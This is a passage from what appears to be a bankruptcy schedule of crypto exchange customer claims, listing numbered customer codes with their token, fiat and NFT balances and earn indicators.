| 07377384 | | BRZ[6.12081625], CUSDT[20], ETHW[.02749238], USD[0.00] | Yes | |
| 07377385 | | SHIB[18794.99317383], USD[0.01] | | |
| 07377386 | | BRZ[0], USD[81.75] | Yes | |
| 07377387 | | USD[0.05] | | |
| 07377388 | | USD[10.00] | | |
| 07377389 | | USD[10.00] | | |
| 07377392 | | USD[10.00] | | |
| 07377393 | | USD[10.00] | | |
| 07377394 | | CUSDT[1], DOGE[62.16602923], TRX[1], USD[1.47] | | |
| 07377395 | | CUSDT[2], TRX[1], USD[0.00] | | |
| 07377396 | | USD[0.00] | Yes | |
| 07377397 | | BRZ[45.57504776], USD[0.00] | | |
| 07377398 | | USD[10.00] | | |
| 07377399 | | DOGE[150.72976024], USD[0.00] | | |
| 07377401 | | USD[10.00] | | |
| 07377402 | | BAT[15.94920166], USD[0.00] | | |
| 07377403 | | GRT[1], TRX[2], USD[0.00] | | |
| 07377404 | | USD[0.01] | | |
| 07377405 | | USD[10.00] | | |
| 07377406 | | BAT[1.0165555], BCH[.01255972], BRZ[1], BTC[.00406351], DOGE[16445.58266444], ETH[.16871085], ETHW[.16839669], TRX[2], USD[55.31], USDT[1.10619024] | Yes | |
| 07377407 | | USD[10.00] | | |
| 07377408 | | BTC[0], CUSDT[2], ETH[0], NFT [529513328122015200/Saudi Arabia Ticket Stub #766][1], SOL[0], TRX[1], USD[0.03] | Yes | |
| 07377410 | | CUSDT[6], DOGE[4778.76958024], TRX[110.876407], USD[1.61] | Yes | |
| 07377412 | | BTC[.00000197], USD[0.00] | | |
| 07377413 | | DOGE[846.56961071], TRX[2], USD[36.73] | | |
| 07377414 | | DOGE[1], USD[0.01] | | |
| 07377415 | | DOGE[141.31509238], USD[0.00] | | |
| 07377416 | | BAT[9.61851687], BTC[.00077763], CUSDT[31], DOGE[53.41780175], ETH[.01053452], ETHW[.01039811], TRX[3], USD[185.42] | Yes | |
| 07377417 | | CUSDT[2], DOGE[1], TRX[2], USD[0.01] | | |
| 07377418 | | USD[10.00] | | |
| 07377419 | | BTC[.00017827], CUSDT[1], DOGE[714.6297756], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07377420 | | DOGE[137.16533031], USD[0.00] | | |
| 07377421 | | USD[10.00] | | |
| 07377422 | | USD[10.00] | | |
| 07377423 | | USD[13.53] | | |
| 07377424 | | USD[10.00] | | |
| 07377426 | | USD[10.00] | | |
| 07377427 | | CUSDT[1], DOGE[2.00227506], USD[0.00] | Yes | |
| 07377428 | | USD[10.00] | | |
| 07377429 | | BTC[0], DOGE[0], ETH[0], MATIC[0], TRX[0], USD[0.49], USDT[0] | | |
| 07377430 | | USD[10.00] | | |
| 07377431 | | DOGE[123.22123979], USD[0.00] | | |
| 07377433 | | USD[10.00] | | |
| 07377434 | | USD[10.00] | | |
| 07377435 | | USD[10.00] | | |
| 07377436 | | SUSHI[.51958802], USD[0.00] | | |
| 07377437 | | BRZ[0], BTC[0], DOGE[1], ETH[0], LINK[0], TRX[0], USD[0.00] | | |
| 07377439 | | BRZ[1], CUSDT[1], DOGE[16975.06479954], GRT[682.21998243], USD[0.00] | Yes | |
| 07377440 | | DOGE[136.6144294], USD[0.00] | | |
| 07377441 | | CUSDT[52.00948125], DOGE[7.23239014], SOL[.00000069], USD[0.00], USDT[0.00000001] | Yes | |
| 07377442 | | BRZ[1], DOGE[3395.89338687], USD[60.00] | | |
| 07377443 | | CAD[0.00], CUSDT[0], DOGE[22.50494439], USD[0.00] | | |
| 07377444 | | USD[0.92] | | |
| 07377445 | | USD[10.00] | | |
| 07377446 | | DOGE[1], USD[0.01] | | |
| 07377448 | | DOGE[24.15026215], USD[0.00] | | |
| 07377449 | | DOGE[24.00034944], USD[0.00] | | |
| 07377451 | | BTC[.00000081], CUSDT[1], DOGE[.00005833], USD[0.01] | | |
| 07377452 | | USD[10.00] | | |
| 07377453 | | TRX[1], USD[0.00] | | |
| 07377454 | | BAT[1.01652464], BRZ[6.64583262], CUSDT[5], DOGE[32012.82146857], GRT[2461.24513565], SHIB[2099947.10249458], TRX[2], USD[0.00] | Yes | |
| 07377455 | | USD[10.00] | | |
| 07377456 | | DOGE[269.88516179], USD[0.00] | | |
| 07377457 | | USD[10.00] | | |
| 07377459 | | DOGE[121.16478616], USD[0.00] | | |
| 07377460 | | USD[10.00] | | |
| 07377461 | | USD[0.01] | | |
| 07377462 | | BRZ[1], CUSDT[12], ETH[.01360108], ETHW[.01343692], TRX[1], USD[0.00] | Yes | |
| 07377465 | | USD[10.00] | | |
| 07377466 | | DOGE[33.30808844], USD[0.00] | Yes | |
| 07377467 | | BTC[.00113485], CUSDT[12], DOGE[485.63963857], NFT [524304301181130775/Marcus Allen's Playbook: Los Angeles Raiders vs. Washington - January 22, 1984 #98][1], NFT [535882638680392438/Marcus Allen's Playbook: Seattle Seahawks vs. Los Angeles Raiders - October 7, 1984 #73][1], SHIB[4763688.04602085], TRX[3922.94039165], USD[10.68] | Yes | |
| 07377468 | | SOL[0], USD[0.00], USDT[0.00000005] | | |
| 07377469 | | BRZ[0], BTC[0.00000981], DOGE[0], ETH[0], LTC[0], SOL[0], USD[0.00] | | |
| 07377470 | | USD[10.00] | | |
| 07377471 | | CUSDT[5], TRX[6], USD[0.00] | | |
| 07377473 | | USD[10.00] | | |
| 07377474 | | BRZ[3], BTC[0], CUSDT[0], DOGE[86.81458573], SHIB[10.38993343], TRX[166.23861852], USD[0.85], USDT[0] | Yes | |
| 07377475 | | BAT[5.70684083], CUSDT[3], DOGE[146.86351481], GRT[8.36433009], SOL[.01844876], TRX[140.16292578], USD[0.48] | Yes | |
| 07377476 | | USD[10.00] | | |
| 07377477 | | BAT[1.0165555], BRZ[2], CUSDT[12.91665773], DAI[.99345986], GRT[1.00498957], TRX[2.46000980], USD[0.00], USDT[1.10980666] | Yes | |
| 07377478 | | USD[0.00] | | |
| 07377480 | | BRZ[1], USD[0.01] | | |
| 07377481 | | CUSDT[2], USD[0.01] | | |
| 07377482 | | USD[10.00] | | |
| 07377483 | | BAT[1], BRZ[1], CUSDT[2], DOGE[493.68008612], GRT[1], TRX[4], USD[0.15] | | |
| 07377484 | | USD[10.00] | | |
| 07377485 | | CUSDT[3], DOGE[5.92055685], ETH[.0001455], ETHW[.0001455], USD[0.97] | | |
| 07377486 | | USD[9.46] | | |
| 07377487 | | AAVE[0], BAT[0], BCH[0], CUSDT[1], DOGE[1], ETH[0], GRT[0], KSHIB[6845.30728173], LINK[0], LTC[0], MATIC[0], SHIB[25775550.70032923], SOL[0], SUSHI[0], TRX[1], USD[0.00], USDT[0.00000001], YFI[0] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07377488 | | USD[0.01], USDT[0] | | |
| 07377489 | | CUSDT[1], DOGE[.00002575], USD[0.00] | | |
| 07377490 | | CUSDT[1], DOGE[0], GRT[1], TRX[1], USD[0.00] | | |
| 07377491 | | CUSDT[3], TRX[1], USD[0.01] | | |
| 07377492 | | USD[10.00] | | |
| 07377493 | | USD[10.00] | | |
| 07377494 | | DOGE[.395], USD[0.00] | | |
| 07377495 | | BRZ[1], USD[0.00] | | |
| 07377496 | | USD[0.00] | | |
| 07377497 | | USD[10.00] | | |
| 07377498 | | SOL[0], SUSHI[0], USD[426.60] | | |
| 07377499 | | DOGE[406.8914941], TRX[1], USD[10.00] | | |
| 07377500 | | BAT[1.01331136], CUSDT[1], DOGE[213.78811036], GRT[5.20359104], TRX[2], USD[0.00], USDT[1.08294831] | Yes | |
| 07377501 | | BAT[1], BRZ[1], BTC[.02137091], CUSDT[2], DOGE[4519.35539245], GRT[629.31193787], TRX[11735.4278681], USD[0.00] | | |
| 07377502 | | USD[10.00] | | |
| 07377504 | | BAT[1], BRZ[4], BTC[.01326173], CUSDT[5], DOGE[4969.13127678], GRT[3], SHIB[23340306.89615238], TRX[511.57661077], USD[15.38] | | |
| 07377505 | | USD[0.00] | | |
| 07377506 | | BRZ[2], CUSDT[1], DOGE[2394.07653711], USD[20.00] | | |
| 07377507 | | BRZ[1], BTC[.00018236], DOGE[1], TRX[1], USD[0.00] | Yes | |
| 07377508 | | CUSDT[1], GRT[2], SOL[3.44010868], TRX[2], USD[0.00] | | |
| 07377509 | | BTC[.0004697], TRX[1], USD[0.00] | | |
| 07377510 | | SHIB[25289903.29227108], USD[0.00], USDT[0] | Yes | |
| 07377511 | | USD[10.00] | | |
| 07377512 | | USD[10.00] | | |
| 07377513 | | BRZ[0.00000010], DOGE[0], GRT[0], TRX[0], USD[0.00] | | |
| 07377515 | | BCH[.00230877], BRZ[.5], BTC[.0002], CUSDT[10], DOGE[57.31562222], ETH[.00088239], ETHW[.00088239], TRX[2], USD[0.43] | | |
| 07377516 | | CUSDT[1], DOGE[122.7971873], USD[0.00] | | |
| 07377517 | | DOGE[129.96238628], USD[0.00] | | |
| 07377518 | | CUSDT[2], DOGE[2726.20949573], TRX[1], USD[0.00] | | |
| 07377519 | | USD[10.00] | | |
| 07377520 | | DOGE[137.46842006], USD[0.00] | | |
| 07377521 | | BRZ[1], CUSDT[37], DOGE[2933.60879608], SHIB[2035733.88156655], TRX[1], USD[0.00] | | |
| 07377522 | | CUSDT[919.24690176], DOGE[2034.5917234], TRX[215.79847702], USD[0.00] | | |
| 07377523 | | USD[10.00] | | |
| 07377524 | | DOGE[196.27497574], USD[0.00] | | |
| 07377525 | | CUSDT[2], DOGE[8259.54018694], SHIB[8242560.8641], USD[0.00] | | |
| 07377526 | | USD[10.00] | | |
| 07377527 | | USD[51.90] | | |
| 07377528 | | USD[10.00] | | |
| 07377529 | | CUSDT[1], DOGE[698.47683033], TRX[1], USD[0.01] | | |
| 07377532 | | CUSDT[4], DOGE[5.72800299], LINK[.00008934], TRX[1.65622880], USD[0.01], USDT[0] | | |
| 07377533 | | USD[10.00] | | |
| 07377534 | | DOGE[1], USD[20.73] | | |
| 07377535 | | CUSDT[1], DOGE[133.92589291], USD[0.00] | | |
| 07377538 | | BRZ[1], CUSDT[1], USD[0.00] | | |
| 07377539 | | BRZ[1], CUSDT[6], DOGE[0], ETH[0], TRX[.00467095], USD[111.17] | Yes | |
| 07377540 | | USD[10.00] | | |
| 07377541 | | CUSDT[2], DOGE[1], ETHW[1.05609361], SHIB[1], TRX[1], USD[0.43] | Yes | |
| 07377542 | | ETH[0], ETHW[0], SHIB[0], USD[8318.89], USDT[0] | Yes | |
| 07377543 | | USD[10.00] | | |
| 07377544 | | USD[10.00] | | |
| 07377545 | | BRZ[1], GRT[1], USD[0.00] | | |
| 07377546 | | DOGE[390.02005467], TRX[.25852786], USD[-7.82] | Yes | |
| 07377548 | | USD[10.00] | | |
| 07377549 | | BRZ[2], BTC[.00491831], CUSDT[5], ETH[.0306973], ETHW[.03031398], LTC[.24058503], SOL[0.57644518], TRX[4], USD[0.00] | Yes | |
| 07377550 | | CUSDT[1], DOGE[117.62647009], TRX[2], USD[0.00] | Yes | |
| 07377551 | | BTC[.00100636], CUSDT[5], DOGE[85.69980987], ETH[.02379045], ETHW[.02379045], GRT[1], LTC[.11124161], TRX[1], USD[30.00] | | |
| 07377552 | | USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07377553 | | USD[10.00] | | |
| 07377554 | | USD[10.00] | | |
| 07377555 | | BAT[.33372062], DOGE[5], GRT[.04388747], TRX[.2382621], USD[0.00] | | |
| 07377556 | | BAT[20.83061187], CUSDT[2], DAI[4.9785049], DOGE[1757.49855651], SOL[6.0086633], USD[0.00] | | |
| 07377557 | | USD[10.00] | | |
| 07377558 | | DOGE[134.26154605], USD[0.00] | | |
| 07377559 | | USD[0.07], USDT[0] | | |
| 07377560 | | DOGE[137.30422648], USD[0.00] | | |
| 07377562 | | BTC[0], DOGE[0], USD[0.00] | | |
| 07377563 | | TRX[220.12337034], USD[0.00] | | |
| 07377564 | | USD[10.00] | | |
| 07377566 | | USD[10.00] | | |
| 07377568 | | CUSDT[1], DOGE[1], USD[0.53] | | |
| 07377569 | | BTC[.00020138], USD[0.00] | | |
| 07377570 | | DOGE[137.61467258], USD[0.00] | | |
| 07377571 | | USD[10.00] | | |
| 07377572 | | BTC[0.00000798], LINK[.2064] | | |
| 07377574 | | CUSDT[2], DOGE[8365.05569064], USD[0.00] | Yes | |
| 07377575 | | BTC[.00000003], CUSDT[1], DOGE[43.73965302], ETH[.00113794], ETHW[.00113794], TRX[1], USD[0.00], USDT[1] | | |
| 07377576 | | BRZ[1], CUSDT[5], DOGE[2160.68102625], TRX[3], USD[0.00] | | |
| 07377577 | | USD[10.00] | | |
| 07377578 | | CUSDT[3], USD[0.55] | | |
| 07377579 | | BRZ[1], CUSDT[2], DOGE[615.62345211], USD[0.01] | | |
| 07377580 | | TRX[3], USD[0.00] | | |
| 07377581 | | BTC[0.00003413], LINK[0], SOL[.060043], USD[8.66], USDT[0] | | |
| 07377582 | | BTC[.00014166], USD[2.06] | | |
| 07377585 | | BRZ[.00014046], BTC[.00000001], CAD[0.01], CUSDT[14], DOGE[.00006679], GRT[.00017699], SOL[.00096055], TRX[3.00023141], USD[0.00] | | |
| 07377586 | | BTC[0], DOGE[0], SOL[0], TRX[0], USD[0.23], USDT[0] | | |
| 07377588 | | USD[10.00] | | |
| 07377589 | | USD[10.00] | | |
| 07377590 | | ETH[.00554309], ETHW[.00554309], USD[0.00] | | |
| 07377591 | | CUSDT[1], DOGE[291.17959531], USD[0.00] | | |
| 07377592 | | USD[10.00] | | |
| 07377593 | | DOGE[1], USD[0.01] | | |
| 07377594 | | USD[10.00] | | |
| 07377596 | | BRZ[1], CUSDT[4], DOGE[945.6437775], SHIB[2], TRX[2], USD[0.00] | Yes | |
| 07377597 | | USD[10.00] | | |
| 07377598 | | USD[47.70] | | |
| 07377599 | | DOGE[134.74464442], USD[0.00] | | |
| 07377600 | | CUSDT[1], USD[58.24] | | |
| 07377602 | | DAI[2.97608371], DOGE[2815.07989911], USD[7.00] | | |
| 07377603 | | USD[10.00] | | |
| 07377604 | | USD[10.98] | Yes | |
| 07377605 | | USD[10.00] | | |
| 07377606 | | USD[10.00] | | |
| 07377607 | | USD[10.00] | | |
| 07377608 | | BRZ[2], BTC[.00643065], CUSDT[7], DOGE[5755.48726952], GRT[1], TRX[3], USD[100.00] | | |
| 07377609 | | USD[0.01] | | |
| 07377610 | | USD[0.00], USDT[9.95402147] | | |
| 07377611 | | CUSDT[2], DOGE[3103.74623419], TRX[1], USD[40.00] | | |
| 07377612 | | BRZ[1], DOGE[1937.44298342], ETH[.04052825], ETHW[.04052825], SHIB[1], TRX[3224.08900489], USD[0.00] | | |
| 07377613 | | LINK[.0967], SOL[.067], SUSHI[.374], TRX[.008] | | |
| 07377615 | | USD[10.00] | | |
| 07377616 | | CUSDT[1], DOGE[4450.1243075], TRX[235.43658095], USD[5.43] | Yes | |
| 07377617 | | CUSDT[3], DOGE[.09578527], GRT[34.55056708], SHIB[2], USD[41.68] | | |
| 07377618 | | USD[10.00] | | |
| 07377619 | | USD[10.00] | | |
| 07377620 | | DOGE[126.92995229], USD[1.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07377621 | | BTC[.01655648], CUSDT[2], DOGE[1], ETH[.38794143], ETHW[.38794143], TRX[1], USD[10.00] | | |
| 07377622 | | DOGE[1], USD[0.01] | | |
| 07377624 | | BRZ[11.45484874], DOGE[63.17712864], USD[24.65] | Yes | |
| 07377625 | | DOGE[1311.68796569], USD[10.00] | | |
| 07377626 | | CUSDT[1], USD[0.00] | | |
| 07377627 | | USD[10.00] | | |
| 07377628 | | USD[18254.96], USDT[0.00151206] | | |
| 07377630 | | CUSDT[1], DOGE[248.57822887], USD[11.04] | Yes | |
| 07377631 | | USD[10.00] | | |
| 07377632 | | USD[10.00] | | |
| 07377633 | | USD[10.00] | | |
| 07377634 | | USD[10.00] | | |
| 07377635 | | BRZ[1], CUSDT[1], DOGE[1], TRX[2], USD[0.01] | | |
| 07377636 | | USD[10.00] | | |
| 07377638 | | BRZ[2], CUSDT[1], DOGE[1315.96980728], USD[0.00] | | |
| 07377639 | | USD[0.00] | | |
| 07377640 | | USD[10.00] | | |
| 07377641 | | ETH[0.00000001], ETHW[0], NFT (409126101360774549/Saudi Arabia Ticket Stub #91][1], USDT[1.7200596] | | |
| 07377642 | | USD[10.00] | | |
| 07377643 | | USD[10.00] | | |
| 07377644 | | DOGE[.02874075], USD[0.00] | Yes | |
| 07377645 | | CUSDT[2], DOGE[163.732319], TRX[1], USD[9.00] | | |
| 07377646 | | USD[10.00] | | |
| 07377648 | | USD[0.00] | | |
| 07377650 | | USD[10.00] | | |
| 07377651 | | DOGE[136.28770552], TRX[1], USD[0.00] | | |
| 07377652 | | CUSDT[3], DOGE[1.0000895], USD[0.01] | | |
| 07377653 | | DOGE[1], USD[0.90] | | |
| 07377654 | | DOGE[45.4106294], USD[0.00] | | |
| 07377657 | | USD[10.00] | | |
| 07377659 | | BAT[1.01608222], USD[0.00] | Yes | |
| 07377660 | | CUSDT[0], LINK[0], SOL[0], TRX[0], USD[0.00] | | |
| 07377661 | | USD[10.00] | | |
| 07377662 | | BAT[0], BTC[0], DOGE[180.99916170], ETH[0], KSHIB[0], SHIB[35.52089577], SOL[0], TRX[2], USD[0.00], USDT[0] | Yes | |
| 07377664 | | USD[10.00] | | |
| 07377665 | | DOGE[26.21671925], USD[0.00] | | |
| 07377666 | | USD[10.00] | | |
| 07377667 | | ALGO[.00014546], BTC[0], DOGE[5], ETH[0], ETHW[0], GRT[1], MATIC[.00718526], SHIB[53], USD[0.01], USDT[0.00000001] | Yes | |
| 07377668 | | DOGE[1], USD[0.00] | | |
| 07377669 | | CUSDT[2], DOGE[1910.07837662], USD[0.00] | Yes | |
| 07377671 | | BRZ[1], CUSDT[1], DOGE[1.00027557], TRX[1], USD[0.61] | | |
| 07377672 | | CUSDT[2], TRX[1], USD[0.01] | | |
| 07377673 | | CUSDT[5], TRX[1], USD[0.01] | | |
| 07377674 | | USD[10.00] | | |
| 07377675 | | TRX[2], USD[0.00] | | |
| 07377676 | | CUSDT[2], GRT[2.07340598], USD[0.01] | Yes | |
| 07377677 | | DOGE[1], USD[9.67] | | |
| 07377678 | | USD[10.00] | | |
| 07377679 | | CUSDT[3], DOGE[140.29584502], ETH[.3853152], ETHW[.38515328], MATIC[139.06952745], SOL[38.43408899], TRX[2], USD[0.00] | Yes | |
| 07377680 | | BRZ[2], CUSDT[1], DOGE[.67965998], USD[0.00] | | |
| 07377681 | | DOGE[5302.92067715], SOL[14.88878908], USD[0.00] | | |
| 07377682 | | DOGE[143.11632652], USD[0.00] | | |
| 07377683 | | USD[10.00] | | |
| 07377685 | | SOL[0.20752772], USD[2.47], USDT[0] | | |
| 07377686 | | BCH[0], BTC[0], ETH[.00030195], ETHW[.00030195], USD[4.20] | | |
| 07377687 | | USD[10.00] | | |
| 07377688 | | CUSDT[2], DOGE[0], ETH[0.00495971], ETHW[0.00489851], LTC[0], TRX[1], USD[0.00], USDT[0] | Yes | |
| 07377689 | | USD[10.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07377690 | | CUSDT[3], DOGE[981.34206111], ETH[.26552851], ETHW[.26552851], TRX[5], USD[0.00] | | |
| 07377692 | | USD[10.00] | | |
| 07377693 | | CUSDT[1], DOGE[1293.44202902], USD[10.00] | | |
| 07377694 | | BAT[2.08008308], BCH[.02953334], BRZ[4], CUSDT[55.15442035], DOGE[3.32932183], GRT[.00873631], TRX[23.73839176], USD[2.03], USDT[2.21780180] | Yes | |
| 07377695 | | ALGO[.00301889], BAT[0], BTC[0], CUSDT[3], DOGE[0], SHIB[2], TRX[1], USD[0.00] | Yes | |
| 07377696 | | DAI[0], DOGE[0.00292856], GRT[0], SHIB[2], SUSHI[0], USD[0.00], USDT[0.00882899] | Yes | |
| 07377697 | | USD[10.00] | | |
| 07377699 | | CUSDT[1], DOGE[1], USD[0.01] | | |
| 07377700 | | BTC[0], DOGE[0], USD[0.24], USDT[0] | | |
| 07377701 | | CUSDT[1], DOGE[1290.27412419], USD[0.00] | | |
| 07377702 | | USD[10.00] | | |
| 07377703 | | USD[10.00] | | |
| 07377704 | | BRZ[1], BTC[.00202771], CUSDT[2], USD[0.00] | | |
| 07377705 | | SOL[4.88652348], USD[5.78], USDT[0] | | |
| 07377706 | | CUSDT[4], SHIB[1], USD[171.82] | Yes | |
| 07377707 | | DOGE[1.46456507], USD[67.70] | | |
| 07377708 | | USD[0.00] | | |
| 07377709 | | CUSDT[1], DOGE[1], TRX[342.19821118], USD[0.00] | | |
| 07377710 | | USD[20.00] | | |
| 07377711 | | CUSDT[1], DOGE[.9453527], TRX[.07349672], USD[9.82] | | |
| 07377712 | | BRZ[1], DOGE[0], USD[0.00] | Yes | |
| 07377713 | | USD[10.00] | | |
| 07377714 | | BTC[0], SOL[0], USD[1978.30] | Yes | |
| 07377715 | | DOGE[1], TRX[547.83203688], USD[10.00] | | |
| 07377716 | | USD[10.00] | | |
| 07377717 | | DOGE[379.7725798], USD[0.00] | Yes | |
| 07377718 | | TRX[173.84667939], USD[0.00] | | |
| 07377719 | | USD[0.00] | | |
| 07377720 | | USD[0.06] | | |
| 07377721 | | DOGE[1], USD[0.01] | | |
| 07377722 | | USD[10.00] | | |
| 07377723 | | BTC[0], SHIB[1], USD[0.00] | Yes | |
| 07377724 | | DOGE[1], USD[0.00] | | |
| 07377726 | | CUSDT[1], USD[0.00], USDT[9.9470557] | | |
| 07377727 | | USD[10.00] | | |
| 07377728 | | BAT[2.08247373], BRZ[8.68700763], CUSDT[36], KSHIB[2347.66634059], MATIC[55.35157552], NFT (303501371169038406/ Colorful Iguana)[1], NFT (321185975314531942/captain america)[1], NFT (412541100322913007/Psycho Stevie B)[1], NFT (432660005967745276/Mad Lions Series #12)[1], NFT (494003908925069642/Piece #4)[1], USD[0.08], USDT[2.16968848] | Yes | |
| 07377729 | | USD[10.00] | | |
| 07377730 | | BTC[0], DOGE[0], SHIB[0], USD[0.36] | | |
| 07377731 | | USD[10.00] | | |
| 07377732 | | ETH[.00221673], ETHW[.00221673], GRT[.6212079], SOL[0], USD[0.00], YFI[.00006817] | | |
| 07377733 | | BAT[.00001283], CUSDT[1], USD[0.00], USDT[1] | | |
| 07377735 | | USD[10.00] | | |
| 07377736 | | USD[10.00] | | |
| 07377738 | | USD[10.00] | | |
| 07377739 | | DOGE[1], USD[0.00] | | |
| 07377740 | | BTC[0], USD[0.00] | | |
| 07377741 | | BRZ[1.01945363], BTC[.00000197], CUSDT[2], DOGE[.70116907], ETH[.00087012], ETHW[.00087012], GRT[1], PAXG[.00345624], TRX[2], USD[0.00], USDT[0] | | |
| 07377742 | | USD[0.00] | | |
| 07377743 | | BAT[0], BTC[0], CUSDT[1], DOGE[1], TRX[0], USD[0.00] | Yes | |
| 07377744 | | BRZ[.00007837], CUSDT[.00104999], MATIC[.00022027], SOL[0], SUSHI[.00106512], TRX[.00016765], UNI[.00012391], USD[0.00], USDT[0.00002950] | | |
| 07377745 | | BTC[.00023218], SHIB[1], USD[0.00], USDT[0] | Yes | |
| 07377746 | | USD[0.00], USDT[9.94904497] | | |
| 07377747 | | LTC[.05772763], USD[0.00] | | |
| 07377748 | | CUSDT[239.08513676], DOGE[598.42425924], TRX[89.16597711], UNI[.27320713], USD[1.00] | | |
| 07377750 | | USD[10.00] | | |
| 07377751 | | DOGE[134.99351963], USD[0.00] | | |
| 07377752 | | CUSDT[2], SOL[0.01185242], TRX[4], USD[0.00], USDT[0.00000094] | Yes | |
| 07377753 | | BAT[4.36005257], BRZ[7.57670559], BTC[0], CUSDT[8], DOGE[14.94862043], ETH[0.00000159], ETHW[0.00000159], GRT[3.08036781], LTC[0], MATIC[0], SHIB[0], SOL[0], SUSHI[0], TRX[25.06932834], UNI[1.09493388], USD[9.10], USDT[4.33208091] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07377754 | | BRZ[1], BTC[0], CUSDT[11], DOGE[7.03424236], ETH[0], SHIB[1], TRX[1], USD[0.00], USDT[0.00034088] | Yes | |
| 07377755 | | BRZ[1], CUSDT[4], DOGE[.00773213], USD[188.65], USDT[0.40099765] | | |
| 07377756 | | TRX[2], USD[0.00] | | |
| 07377757 | | BTC[0], DOGE[0], USD[0.00] | | |
| 07377759 | | USD[10.00] | | |
| 07377760 | | DOGE[171.64352797], USD[0.00] | | |
| 07377761 | | BF_POINT[200], USD[0.00] | | |
| 07377762 | | USD[8.11] | | |
| 07377763 | | USD[10.00] | | |
| 07377765 | | DOGE[1], USD[365.04] | Yes | |
| 07377766 | | USD[10.00] | | |
| 07377768 | | DOGE[.434], LTC[.00788], TRX[.49], USD[0.75], USDT[0.00386247] | | |
| 07377769 | | BCH[.02636552], CUSDT[147.85228343], DOGE[2.00020555], GRT[21.53248574], MATIC[2.12668079], SHIB[3], SOL[1.03178477], SUSHI[3.07152462], TRX[97.25508918], UNI[2.03919173], USD[13.88], USDT[5.45624673] | Yes | |
| 07377770 | | BRZ[2], CUSDT[2], DOGE[3], USD[0.00] | | |
| 07377771 | | USD[10.00] | | |
| 07377772 | | BRZ[1], CUSDT[9], DOGE[0], USD[0.00], USDT[0] | Yes | |
| 07377773 | | CUSDT[1], DOGE[1], TRX[1], USD[74.52] | | |
| 07377774 | | CUSDT[1], DOGE[0], USD[202.92], USDT[0.00000001] | | |
| 07377775 | | USD[10.00] | | |
| 07377776 | | BTC[.00087996], CUSDT[5], DOGE[4427.08103641], USD[0.00] | | |
| 07377777 | | DOGE[168.79535681], USD[0.00] | Yes | |
| 07377778 | | BTC[.00035218], CUSDT[8], DOGE[3124.36790755], TRX[1], USD[0.00] | Yes | |
| 07377779 | | BTC[.01165065], ETH[0.00086230], ETHW[0.00086230], SHIB[4900000], SOL[4.73], USD[0.21] | | |
| 07377780 | | USD[10.00] | | |
| 07377781 | | BRZ[1], CUSDT[7], DOGE[1], TRX[1], USD[0.20] | Yes | |
| 07377782 | | TRX[1], USD[48.99] | Yes | |
| 07377783 | | CUSDT[2.06657184], DOGE[.01047931], USD[0.00] | Yes | |
| 07377784 | | BTC[0], CUSDT[1], DOGE[2], ETH[0], ETHW[0], GRT[0], USD[0.00] | | |
| 07377785 | | CUSDT[11.11666512], DOGE[.90356129], GRT[.49], LTC[.00003918], TRX[2.51076788], USD[0.26] | | |
| 07377787 | | CUSDT[1], DOGE[1.68624094], USD[0.90] | | |
| 07377789 | | USD[10.00] | | |
| 07377790 | | DOGE[.88148212], USD[0.00] | | |
| 07377792 | | USD[10.00] | | |
| 07377793 | | CUSDT[324.89604834], DOGE[554.13187284], GRT[16.9856542], LINK[10.73041466], SHIB[6252104.97362312], SOL[10.63237551], SUSHI[19.73962144], TRX[4322.62218867], USD[0.00], USDT[0] | Yes | |
| 07377794 | | USD[10.00] | | |
| 07377795 | | BRZ[2], SHIB[15001220.6783791], TRX[1], USD[137.87] | Yes | |
| 07377797 | | USD[10.00] | | |
| 07377798 | Contingent, Disputed | USD[0.00] | | |
| 07377799 | | USD[0.00] | | |
| 07377800 | | USD[0.01] | | |
| 07377801 | | BRZ[1], CUSDT[6], DOGE[1053.80791467], ETH[.00000001], GRT[3.08037252], TRX[3], USD[0.00], USDT[0] | Yes | |
| 07377802 | | BTC[0.02202416], CUSDT[3], DOGE[792.9808605], USD[0.00] | | |
| 07377803 | | CUSDT[2], DOGE[740.94044171], ETH[0], ETHW[0], PAXG[0], TRX[1], USD[0.00] | | |
| 07377804 | | CUSDT[2], DOGE[15.00339034], TRX[1], USD[0.00] | | |
| 07377805 | | USD[10.00] | | |
| 07377806 | | DOGE[1050.16989598], ETH[.0138369], ETHW[.0138369], USD[34.99] | | |
| 07377807 | | BAT[1], BTC[.00198548], CUSDT[6], DOGE[378.36221986], GRT[1], TRX[1757.93946127], USD[0.00] | | |
| 07377808 | | BAT[21.65360245], BTC[0], CUSDT[1284.51784472], DOGE[0], ETH[0.00900832], ETHW[0.00978520], LTC[0.08812183], SHIB[2486.28884074], SUSHI[1.19988915], TRX[139.07984016], USD[0.00], USDT[0], YFI[0.00026361] | Yes | |
| 07377809 | | DOGE[124.98454878], USD[0.00] | | |
| 07377810 | | BRZ[1], CUSDT[1], USD[0.01] | | |
| 07377811 | | BTC[.00160284], CUSDT[8], DOGE[303.85108799], ETH[.01392717], ETHW[.01392717], GRT[5.96238121], SUSHI[.70549835], TRX[76.22561666], USD[0.00] | | |
| 07377812 | | CUSDT[1], DOGE[81.20805349], GRT[.00001817], USD[0.01] | | |
| 07377813 | | USD[10.00] | | |
| 07377814 | | USD[10.00] | | |
| 07377815 | | BAT[.00000108], BRZ[1], CUSDT[1], DOGE[2], TRX[1], USD[110.47] | | |
| 07377816 | | BRZ[1], BTC[.00788075], CUSDT[5], DOGE[688.58016013], ETH[.01910024], ETHW[.01886768], GRT[33.09840018], SHIB[2], USD[211.21] | Yes | |
